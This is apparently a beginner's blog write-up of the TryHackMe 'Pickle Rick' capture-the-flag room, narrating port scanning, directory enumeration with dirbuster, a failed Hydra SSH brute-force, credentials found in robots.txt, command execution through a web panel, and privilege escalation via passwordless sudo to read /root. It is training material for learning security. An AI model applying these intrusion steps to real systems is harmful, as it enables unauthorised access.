TryHackMe.com is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
TryHackMe is extremely addicting and lots of fun even for a n00b like me. You learn a lot of InfoSec stuff and it's a bit gamified. The community is kind and helpful. Some of the more juicy stuff is paywall'd and that sucks but I'm having a great time working my way through all of the free rooms.
What follows is my attempt at a painfully honest writeup of the CTF room Pickle Rick. It's my plan to complete all of the (easy) rooms but I will only publish writeups of the ones I find particularly enjoyable and interesting. Btw, I solve TryHackMe challenges in a plain Kali Linux VM.
This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
I've never seen an episode of Rick and Morty in my life so I was afraid this room would require you to understand references to the show but let's give it a try.
- We start with an IP address. By the description of the room we would assume there's a web server running on port 80 and nmap confirms that this is indeed the case.
- We open the IP address in Firefox to examine the web server.
- Viewing the source of the page gives us a username right off the bat so this looks promising.
- nmap also showed that there's a SSH server running. I tried to brute force the SSH server using Hydra with the obtained username but unfortunately the server doesn't allow password authentication. Back to the web server.
- There is an image on the frontpage. Looking at where the picture is coming from we find a directory named /assets. Inspecting this directory we find some information, including the Ubuntu version. Are there any more exposed directories to examine? Let's find out. Running dirbuster on the web server with /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt let's us find the login page. I guess one should have been able to guess it but I'm lazy.
- At this point I was stuck for a while. I tried some very basic SQL injections, searched for some relevant Ubuntu exploit on exploit-db.com and tried to brute force the login via Burp Suite using lists of common passwords but no luck.
- I finally asked for a hint on discord and someone advised me to look in /assets. This yielded nothing but made me rethink my approach to the problem. Back to basics. I had a proper look at the output from dirbuster. There was things I had missed looking into because I assumed they were not relevant. For example /icons and /robots.txt. The latter contains a suspicious string.
- Logging in with username:suspicious string works, I'M IN!.
- Upon login we are greeted with a command panel. Trying to click around to other pages we are denied access apparently because "only the real REAL rick can view this page.. ". However looking at the source we find yet another long mysterious string.
- The command panel is a shell and whoami tells us that we are 'www-data', as expected. By taking a quick look in the current directory we find the first ingredient! But cat is disabled and so is head, tail, more, less and every other command I could think of. Surely there is a way around this. We are in /var/www/html/ and by checking if we have read permissions with ls -a filename we can read it in the web browser. Success!
- For the second ingredient. I went the extremely lazy route of executing find / in the shell and then doing a ctrl+f search in the browser for Ingred and sure enough we got a match in the home directory of a certain user corresponding to the php login. But how to access it? The first trick will not work in this situation. I assumed the long random string found earlier might be the password of this user on the machine so I tried piping it sudo in different ways but I never got it to work. I also tried creating a link to it. Luckily we have read permissions to the file.
- I was stuck again so I paused and did some research on print commands and found strings. I've never even heard about it before. strings /home/user/file. BAM!
- The third ingredient was easy to find. sudo -l gives us the
Matching Defaults entries for www-data on ip-10-10-X-X.eu-west-1.compute.internal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ip-10-10-31-147.eu-west-1.compute.internal: (ALL) NOPASSWD: ALL
- In other words we can sudo all we want without having to provide a password. How convenient! Let's have a look in /root by executing sudo ls /root and yes there is something interesting there. Using the strings command again we find the third ingredient and can help Pickle Rick make his potion so he transform himself back into a human. Mission complete.
- I need to try hard not to overthink things and assume the intended solution is hard. If a challenge is marked as easy, then it probably is easy.
- I should try to examine everything I find very carefully. Don't assume something is not useful. E.g. robots.txt.
- Not everything found is useful. I never found a use for that second weird string.
- Strings ftw!